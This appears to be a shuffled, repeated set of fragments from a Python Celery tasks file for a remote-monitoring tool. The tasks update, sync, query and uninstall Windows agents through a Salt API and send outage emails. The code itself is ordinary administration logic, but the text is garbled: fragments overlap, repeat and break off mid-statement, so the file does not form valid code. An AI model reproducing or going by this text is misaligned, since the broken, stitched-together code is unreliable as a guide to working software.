outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15))", "+ 50] for i in range(0, len(online), 50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk,", "def batch_sysinfo_task(): # update system info using WMI agents = Agent.objects.all() online =", "r == \"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt modules", "range(0, len(agents), 50)) for chunk in chunks: for pk in chunk: agent =", "CoreSettings.objects.first() if not core.agent_auto_update: return q = Agent.objects.all() agents = [ i.pk for", "i + 50] for i in range(0, len(online), 50)) for chunk in chunks:", "= settings.DL_64 if arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if", "return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent =", "agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def update_salt_minion_task():", "AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save() if agent.overdue_email_alert: agent_outage_email_task.delay(pk=outage.pk)", ") r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10)", "if arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch ==", "import Agent, AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert", "arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\"", "pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i : i + 50] for i", "{'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync with no new/changed files: {'return':", "False while 1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\":", "in agent.operating_system: arch = \"64\" elif \"32bit\" in agent.operating_system: arch = \"32\" else:", "Agent.objects.filter(pk__in=pks) agents = [i.pk for i in q if pyver.parse(i.version) < pyver.parse(version)] chunks", "new/changed files: {'return': [{'MINION-15': []}]} if r == \"timeout\" or r == \"error\":", "= ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async(", "func=\"saltutil.sync_modules\") # successful sync if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} #", "8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=10, ) ret =", ") sleep(10) @app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first() if not core.agent_auto_update: return q", "new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync with no new/changed", "= Agent.objects.get(pk=pk) if agent.operating_system is not None: if \"64bit\" in agent.operating_system: arch =", "if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i : i + 30] for", "agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def auto_self_agent_update_task():", "== \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue outage = AgentOutage(agent=agent)", "= Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r", "def batch_sync_modules_task(): # sync modules, split into chunks of 50 agents to not", "\"wheel\", \"fun\": \"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ],", "\"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=10, ) ret = r.json()[\"return\"][0][salt_id]", "of 50 agents to not overload salt agents = Agent.objects.all() online = [i.salt_id", "to not overload salt agents = Agent.objects.all() online = [i.salt_id for i in", "batch_sync_modules_task(): # sync modules, split into chunks of 50 agents to not overload", "(online[i : i + 30] for i in range(0, len(online), 30)) for chunk", "== \"timeout\" or r == \"error\": return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return", "in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i : i +", "agent.operating_system: arch = \"32\" else: arch = \"64\" url = settings.DL_64 if arch", "else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, },", "= CoreSettings.objects.first() if not core.agent_auto_update: return q = Agent.objects.all() agents = [ i.pk", "arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if arch == \"64\"", "if i.status == \"online\"] chunks = (online[i : i + 50] for i", "from time import sleep import random import requests from packaging import version as", "chunks = (agents[i : i + 30] for i in range(0, len(agents), 30))", "error = True break elif attempts == 0: break if error: logger.error(f\"{salt_id} uninstall", "\"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30, ) except", "outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True", "func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): attempts = 0 error = False while 1:", "30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): attempts =", "@app.task def update_salt_minion_task(): q = Agent.objects.all() agents = [ i.pk for i in", "in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): attempts = 0 error =", "agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\" or r", "['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync with no new/changed files: {'return': [{'MINION-15': []}]}", "try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\", \"match\": salt_id,", "arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno,", "i in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks", "q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i", "= Agent.objects.only(\"pk\") for agent in agents: if agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent)", "was successfully uninstalled\") try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\":", "info using WMI agents = Agent.objects.all() online = [ i.salt_id for i in", "r.json()[\"return\"][0][salt_id] except Exception: attempts += 1 else: if ret != \"ok\": attempts +=", "if ret != \"ok\": attempts += 1 else: attempts = 0 if attempts", "for i in range(0, len(agents), 50)) for chunk in chunks: for pk in", "salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ],", "arch = \"32\" else: arch = \"64\" url = settings.DL_64 if arch ==", "f\"winagent-v{version}.exe\" if arch == \"64\" else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={", "\"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url,", "r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task", "def send_agent_update_task(pks, version): assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents = [i.pk for", "\"<PASSWORD>\", } ], timeout=30, ) except Exception: logger.error(f\"{salt_id} unable to remove salt-key\") return", "logger from time import sleep import random import requests from packaging import version", "< pyver.parse(version)] chunks = (agents[i : i + 30] for i in range(0,", "and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i : i + 50] for", "@app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first() if not core.agent_auto_update: return q = Agent.objects.all()", "logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents =", "agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r", "= Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if new/charnged files: {'return':", "split into chunks of 50 agents to not overload salt agents = Agent.objects.all()", "agent.operating_system is not None: if \"64bit\" in agent.operating_system: arch = \"64\" elif \"32bit\"", "settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r", "and i.status == \"online\" ] chunks = (online[i : i + 30] for", "using WMI agents = Agent.objects.all() online = [ i.salt_id for i in agents", ": i + 50] for i in range(0, len(online), 50)) for chunk in", "= False while 1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\",", "\"online\" ] chunks = (online[i : i + 30] for i in range(0,", "\"eauth\": \"<PASSWORD>\", } ], timeout=10, ) ret = r.json()[\"return\"][0][salt_id] except Exception: attempts +=", "successful sync with no new/changed files: {'return': [{'MINION-15': []}]} if r == \"timeout\"", "# successful sync with no new/changed files: {'return': [{'MINION-15': []}]} if r ==", "attempts += 1 else: attempts = 0 if attempts >= 10: error =", "for i in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i :", "else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, },", "logger.error(f\"{salt_id} unable to remove salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage", "core.agent_auto_update: return q = Agent.objects.all() agents = [ i.pk for i in q", "chunk in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\")", "@app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"])", "\"timeout\" or r == \"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced", "subprocess from loguru import logger from time import sleep import random import requests", "ret != \"ok\": attempts += 1 else: attempts = 0 if attempts >=", "'etc...']}]} # successful sync with no new/changed files: {'return': [{'MINION-15': []}]} if r", "\"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\":", "sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task():", "isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents = [i.pk for i in q if", "] chunks = (agents[i : i + 30] for i in range(0, len(agents),", "Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): # update system info using WMI agents", "if r == \"timeout\" or r == \"error\": return \"failed\" agent.wmi_detail = r", "func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def auto_self_agent_update_task(): core", "get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\" or", "as pyver from django.conf import settings from tacticalrmm.celery import app from agents.models import", "@app.task def send_agent_update_task(pks, version): assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents = [i.pk", "auto_self_agent_update_task(): core = CoreSettings.objects.first() if not core.agent_auto_update: return q = Agent.objects.all() agents =", "agents: if agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue", "agent.operating_system: arch = \"64\" elif \"32bit\" in agent.operating_system: arch = \"32\" else: arch", "= requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8,", "attempts >= 10: error = True break elif attempts == 0: break if", "for pk in chunk: agent = Agent.objects.get(pk=pk) if agent.operating_system is not None: if", "salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30, ) except Exception:", "in range(0, len(online), 30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def", "\"64\" elif \"32bit\" in agent.operating_system: arch = \"32\" else: arch = \"64\" url", "outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent in", "'modules.win_agent', 'etc...']}]} # successful sync with no new/changed files: {'return': [{'MINION-15': []}]} if", "+= 1 else: if ret != \"ok\": attempts += 1 else: attempts =", "return logger.info(f\"Successfully synced salt modules on {agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task(): #", "< pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i : i + 50] for i in", "+ 50] for i in range(0, len(agents), 50)) for chunk in chunks: for", "attempts = 0 error = False while 1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\",", "continue outage = AgentOutage(agent=agent) outage.save() if agent.overdue_email_alert: agent_outage_email_task.delay(pk=outage.pk) if agent.overdue_text_alert: # TODO pass", "import logger from time import sleep import random import requests from packaging import", "if arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if arch ==", "outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email()", "50)) for chunk in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) r", "synced salt modules on {agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task(): # sync modules,", "(agents[i : i + 50] for i in range(0, len(agents), 50)) for chunk", "\"ok\": attempts += 1 else: attempts = 0 if attempts >= 10: error", "not None: if \"64bit\" in agent.operating_system: arch = \"64\" elif \"32bit\" in agent.operating_system:", "in agents if i.status == \"online\"] chunks = (online[i : i + 50]", "= Agent.objects.all() agents = [ i.pk for i in q if pyver.parse(i.version) <", "agents.models import Agent, AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version):", "( f\"winagent-v{version}.exe\" if arch == \"64\" else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\",", "agents if not i.not_supported(\"0.11.0\") and i.status == \"online\" ] chunks = (online[i :", "chunk in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) if agent.operating_system is", "len(online), 30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): attempts", "core = CoreSettings.objects.first() if not core.agent_auto_update: return q = Agent.objects.all() agents = [", "r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35,", "= 0 error = False while 1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[", "in range(0, len(agents), 50)) for chunk in chunks: for pk in chunk: agent", "\"url\": url, }, ) sleep(10) @app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first() if not", "== \"64\" else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else", "if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i :", "], timeout=10, ) ret = r.json()[\"return\"][0][salt_id] except Exception: attempts += 1 else: if", "r == \"timeout\" or r == \"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\") return", "sleep(10) @app.task def batch_sysinfo_task(): # update system info using WMI agents = Agent.objects.all()", "for chunk in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) r =", "not i.not_supported(\"0.11.0\") and i.status == \"online\" ] chunks = (online[i : i +", "1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\": salt_id, \"fun\":", ": i + 30] for i in range(0, len(agents), 30)) for chunk in", "1 else: if ret != \"ok\": attempts += 1 else: attempts = 0", "# successful sync if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful", "30] for i in range(0, len(agents), 30)) for chunk in chunks: for pk", "sync with no new/changed files: {'return': [{'MINION-15': []}]} if r == \"timeout\" or", "in range(0, len(agents), 30)) for chunk in chunks: for pk in chunk: agent", "for pk in chunk: agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def", "\"<PASSWORD>\", } ], timeout=10, ) ret = r.json()[\"return\"][0][salt_id] except Exception: attempts += 1", "i in range(0, len(agents), 30)) for chunk in chunks: for pk in chunk:", "pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i : i + 50] for i in range(0,", "attempts == 0: break if error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was successfully", "chunks of 50 agents to not overload salt agents = Agent.objects.all() online =", "for i in agents if not i.not_supported(\"0.11.0\") and i.status == \"online\" ] chunks", "url = settings.DL_64 if arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\"", "i in range(0, len(online), 50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task", "logger.info(f\"Successfully synced salt modules on {agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task(): # sync", "sync modules, split into chunks of 50 agents to not overload salt agents", "\"ok\" @app.task def batch_sync_modules_task(): # sync modules, split into chunks of 50 agents", "\"64bit\" in agent.operating_system: arch = \"64\" elif \"32bit\" in agent.operating_system: arch = \"32\"", "sleep(10) @app.task def update_salt_minion_task(): q = Agent.objects.all() agents = [ i.pk for i", "salt agents = Agent.objects.all() online = [i.salt_id for i in agents if i.status", "i in range(0, len(online), 30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task", "agents if i.status == \"online\"] chunks = (online[i : i + 50] for", "10: error = True break elif attempts == 0: break if error: logger.error(f\"{salt_id}", "@app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent in agents: if agent.status ==", "i in agents if not i.not_supported(\"0.11.0\") and i.status == \"online\" ] chunks =", "= requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME,", "= [ i.pk for i in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks", "else: attempts = 0 if attempts >= 10: error = True break elif", "outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk)", "{agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task(): # sync modules, split into chunks of", "r == \"error\": return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def", "or r == \"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt", "list) q = Agent.objects.filter(pk__in=pks) agents = [i.pk for i in q if pyver.parse(i.version)", "\"error\": return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def sync_salt_modules_task(pk): agent", "sleep(10) @app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first() if not core.agent_auto_update: return q =", "= AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage", "outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save() if agent.overdue_email_alert: agent_outage_email_task.delay(pk=outage.pk) if agent.overdue_text_alert: # TODO", "for i in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ]", "\"eauth\": \"<PASSWORD>\", } ], timeout=30, ) except Exception: logger.error(f\"{salt_id} unable to remove salt-key\")", "for chunk in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) if agent.operating_system", "i.not_supported(\"0.11.0\") and i.status == \"online\" ] chunks = (online[i : i + 30]", "attempts = 0 if attempts >= 10: error = True break elif attempts", "if arch == \"64\" else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\":", "True break elif attempts == 0: break if error: logger.error(f\"{salt_id} uninstall failed\") else:", "= r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r =", "agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent in agents: if agent.status == \"overdue\": outages", "@app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r ==", "pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i : i + 30] for i in", "i.salt_id for i in agents if not i.not_supported(\"0.11.0\") and i.status == \"online\" ]", "agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if new/charnged files:", "Agent.objects.only(\"pk\") for agent in agents: if agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if", "= [i.pk for i in q if pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i", "logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\") try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\",", "url = settings.DL_64 if arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{version}.exe\"", "= r.json()[\"return\"][0][salt_id] except Exception: attempts += 1 else: if ret != \"ok\": attempts", "in chunk: agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent", "i + 30] for i in range(0, len(online), 30)) for chunk in chunks:", "for i in range(0, len(online), 50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10)", "], timeout=30, ) except Exception: logger.error(f\"{salt_id} unable to remove salt-key\") return \"ok\" @app.task", "timeout=10, ) ret = r.json()[\"return\"][0][salt_id] except Exception: attempts += 1 else: if ret", "requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\":", "\"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True", "= (online[i : i + 50] for i in range(0, len(online), 50)) for", "uninstall failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\") try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[", "ret = r.json()[\"return\"][0][salt_id] except Exception: attempts += 1 else: if ret != \"ok\":", "} ], timeout=30, ) except Exception: logger.error(f\"{salt_id} unable to remove salt-key\") return \"ok\"", "Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if new/charnged files: {'return': [{'MINION-15':", "update system info using WMI agents = Agent.objects.all() online = [ i.salt_id for", "return \"ok\" @app.task def batch_sync_modules_task(): # sync modules, split into chunks of 50", "@app.task def uninstall_agent_task(salt_id): attempts = 0 error = False while 1: try: r", "} ], timeout=10, ) ret = r.json()[\"return\"][0][salt_id] except Exception: attempts += 1 else:", "agents = [ i.pk for i in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ]", "i.pk for i in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i", "Exception: attempts += 1 else: if ret != \"ok\": attempts += 1 else:", "= agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent',", "update_salt_minion_task(): q = Agent.objects.all() agents = [ i.pk for i in q if", "in agents: if agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active:", "to sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt modules on {agent.hostname}\") return \"ok\"", "loguru import logger from time import sleep import random import requests from packaging", "== \"online\" ] chunks = (online[i : i + 30] for i in", "\"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30, ) except Exception: logger.error(f\"{salt_id} unable to", ") sleep(10) @app.task def update_salt_minion_task(): q = Agent.objects.all() agents = [ i.pk for", "Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): attempts = 0 error = False while", "] chunks = (agents[i : i + 50] for i in range(0, len(agents),", "agents = Agent.objects.all() online = [ i.salt_id for i in agents if not", "30)) for chunk in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) if", "i + 50] for i in range(0, len(agents), 50)) for chunk in chunks:", "{ \"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD,", "r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog',", "15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1,", "r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\" or r == \"error\": return", "for agent in agents: if agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages", "uninstalled\") try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\", \"match\":", "Agent.objects.all() online = [ i.salt_id for i in agents if not i.not_supported(\"0.11.0\") and", "len(online), 50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): #", "with no new/changed files: {'return': [{'MINION-15': []}]} if r == \"timeout\" or r", "r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30,", "50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): # update", "for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): attempts = 0", "modules, split into chunks of 50 agents to not overload salt agents =", "{'return': [{'MINION-15': []}]} if r == \"timeout\" or r == \"error\": logger.error(f\"Unable to", "30] for i in range(0, len(online), 30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\")", "in chunk: agent = Agent.objects.get(pk=pk) if agent.operating_system is not None: if \"64bit\" in", "chunks = (online[i : i + 30] for i in range(0, len(online), 30))", "i.status == \"online\"] chunks = (online[i : i + 50] for i in", "pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i : i + 30] for i", "Agent, AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert isinstance(pks,", "range(0, len(agents), 30)) for chunk in chunks: for pk in chunk: agent =", "else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" )", "error = False while 1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\":", "uninstall_agent_task(salt_id): attempts = 0 error = False while 1: 